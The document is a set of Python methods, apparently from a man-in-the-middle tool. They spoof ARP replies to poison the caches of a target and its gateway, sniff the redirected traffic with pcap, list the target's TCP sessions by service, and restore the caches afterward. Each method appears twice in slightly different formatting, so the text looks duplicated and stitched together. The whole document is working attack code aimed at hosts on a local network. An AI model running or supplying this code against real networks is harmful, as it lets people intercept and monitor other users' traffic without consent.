def restore(self, delay, target_b=None):
""" reset arp cache of the target and the router (AP) """
if not target_b:
target_b = self.gateway
source_mac = utils.get_mac_by_ip(target_b)
sock = socket(PF_PACKET, SOCK_RAW)
sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
if not isinstance(self.target, list):
target_mac = utils.get_mac_by_ip(self.target)
for _ in xrange(6):
sock.send(
str(
utils.build_arp_packet(target_mac, target_b,
self.target)))
sock.send(
str(
utils.build_arp_packet(source_mac, self.target,
target_b)))
else:
for addr in self.target:
target_mac = utils.get_mac_by_ip(addr)
for _ in xrange(6):
sock.send(
str(utils.build_arp_packet(target_mac, target_b,
addr)))
sock.send(
str(utils.build_arp_packet(source_mac, addr,
target_b)))
def poison(self, delay, target_b=None):
if not target_b:
target_b = self.gateway
src_mac = ':'.join(a+b for a, b in zip(self.src_mac[::2], self.src_mac[1::2]))
if not isinstance(self.target, list):
dst_mac = utils.get_mac_by_ip(self.target)
send(ARP(op=2, pdst=self.target, psrc=target_b, hwdst=dst_mac), verbose=False)
send(ARP(op=2, pdst=target_b, psrc=self.target, hwdst=src_mac), verbose=False)
else:
for addr in self.target:
dst_mac = utils.get_mac_by_ip(addr)
send(ARP(op=2, pdst=addr, psrc=target_b, hwdst=dst_mac), verbose=False)
send(ARP(op=2, pdst=target_b, psrc=addr, hwdst=src_mac), verbose=False)
def poison(self, delay, target_b=None):
if not target_b:
target_b = self.gateway
src_mac = ':'.join(a+b for a, b in zip(self.src_mac[::2], self.src_mac[1::2]))
if not isinstance(self.target, list):
dst_mac = utils.get_mac_by_ip(self.target)
send(ARP(op=2, pdst=self.target, psrc=target_b, hwdst=dst_mac), verbose=False)
send(ARP(op=2, pdst=target_b, psrc=self.target, hwdst=src_mac), verbose=False)
else:
for addr in self.target:
dst_mac = utils.get_mac_by_ip(addr)
send(ARP(op=2, pdst=addr, psrc=target_b, hwdst=dst_mac), verbose=False)
send(ARP(op=2, pdst=target_b, psrc=addr, hwdst=src_mac), verbose=False)
def restore(self, delay, target_b=None):
""" reset arp cache of the target and the router (AP) """
if not target_b:
target_b = self.gateway
source_mac = utils.get_mac_by_ip(target_b)
sock = socket(PF_PACKET, SOCK_RAW)
sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
if not isinstance(self.target, list):
target_mac = utils.get_mac_by_ip(self.target)
for _ in xrange(6):
sock.send(str(utils.build_arp_packet(target_mac, target_b, self.target)))
sock.send(str(utils.build_arp_packet(source_mac, self.target, target_b)))
else:
for addr in self.target:
target_mac = utils.get_mac_by_ip(addr)
for _ in xrange(6):
sock.send(str(utils.build_arp_packet(target_mac, target_b, addr)))
sock.send(str(utils.build_arp_packet(source_mac, addr, target_b)))
def list_sessions(self, stop, target_b=None, port=None):
"""
Try to get all TCP sessions of the target
"""
notorious_services = {
20: ' ftp-data session',
21: ' ftp-data session',
22: ' ssh session',
23: ' telnet session',
25: ' SMTP session',
80: ' HTTP session',
110: ' POP3 session',
143: ' IMAP session',
194: ' IRC session',
220: ' IMAPv3 session',
443: ' SSL session',
445: ' SAMBA session',
989: ' FTPS session',
990: ' FTPS session',
992: ' telnet SSL session',
993: ' IMAP SSL session',
994: ' IRC SSL session'
}
source = utils.get_default_gateway_linux()
if target_b and target_b != self.gateway:
source = utils.get_mac_by_ip(target_b)
pcap_filter = self._build_pcap_filter("ip host ", port)
packets = pcap.pcap(self.dev)
packets.setfilter(pcap_filter) # we need only self.target packets
# need to create a daemon that continually poison our target
poison_thread = Thread(target=self.poison, args=(
2,
target_b,
))
poison_thread.daemon = True
poison_thread.start()
print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
source + W + ' and ' + R + (','.join(self.target) if isinstance(
self.target, list) else self.target) + W + '\n')
sessions = {}
try:
for _, pkt in packets:
if stop():
break
eth = dpkt.ethernet.Ethernet(pkt)
ip_packet = eth.data
if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
tcp = ip_packet.data
if tcp.flags != dpkt.tcp.TH_RST:
sess = "%-25s <-> %25s" % (
inet_ntoa(ip_packet.src) + ":" + str(tcp.sport),
inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport))
check = False
if sess not in sessions:
check = True
sessions[sess] = "Others"
if tcp.sport in notorious_services:
sessions[sess] = notorious_services[tcp.sport]
elif tcp.dport in notorious_services:
sessions[sess] = notorious_services[tcp.dport]
if check is True:
print(" [{:^5}] {} : {}".format(
len(sessions), sess, sessions[sess]))
self.sessions.append(sess)
except KeyboardInterrupt:
print('[+] Session scan interrupted\n\r')
self.restore(2)
utils.set_ip_forward(0)
def list_sessions(self, stop, target_b=None, port=None):
"""
Try to get all TCP sessions of the target
"""
notorious_services = {
20: ' ftp-data session',
21: ' ftp-data session',
22: ' ssh session',
23: ' telnet session',
25: ' SMTP session',
80: ' HTTP session',
110: ' POP3 session',
143: ' IMAP session',
194: ' IRC session',
220: ' IMAPv3 session',
443: ' SSL session',
445: ' SAMBA session',
989: ' FTPS session',
990: ' FTPS session',
992: ' telnet SSL session',
993: ' IMAP SSL session',
994: ' IRC SSL session'
}
source = utils.get_default_gateway_linux()
if target_b and target_b != self.gateway:
source = utils.get_mac_by_ip(target_b)
pcap_filter = self._build_pcap_filter("ip host ", port)
packets = pcap.pcap(self.dev)
packets.setfilter(pcap_filter) # we need only self.target packets
# need to create a daemon that continually poison our target
poison_thread = Thread(target=self.poison, args=(2, target_b, ))
poison_thread.daemon = True
poison_thread.start()
print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W
+ ' and ' + R
+ (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
sessions = {}
try:
for _, pkt in packets:
if stop():
break
eth = dpkt.ethernet.Ethernet(pkt)
ip_packet = eth.data
if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
tcp = ip_packet.data
if tcp.flags != dpkt.tcp.TH_RST:
sess = "%-25s <-> %25s" % (inet_ntoa(ip_packet.src) + ":"
+ str(tcp.sport), inet_ntoa(ip_packet.dst) + ":"
+ str(tcp.dport))
check = False
if sess not in sessions:
check = True
sessions[sess] = "Others"
if tcp.sport in notorious_services:
sessions[sess] = notorious_services[tcp.sport]
elif tcp.dport in notorious_services:
sessions[sess] = notorious_services[tcp.dport]
if check is True:
print(" [{:^5}] {} : {}".format(len(sessions), sess, sessions[sess]))
self.sessions.append(sess)
except KeyboardInterrupt:
print('[+] Session scan interrupted\n\r')
self.restore(2)
utils.set_ip_forward(0)
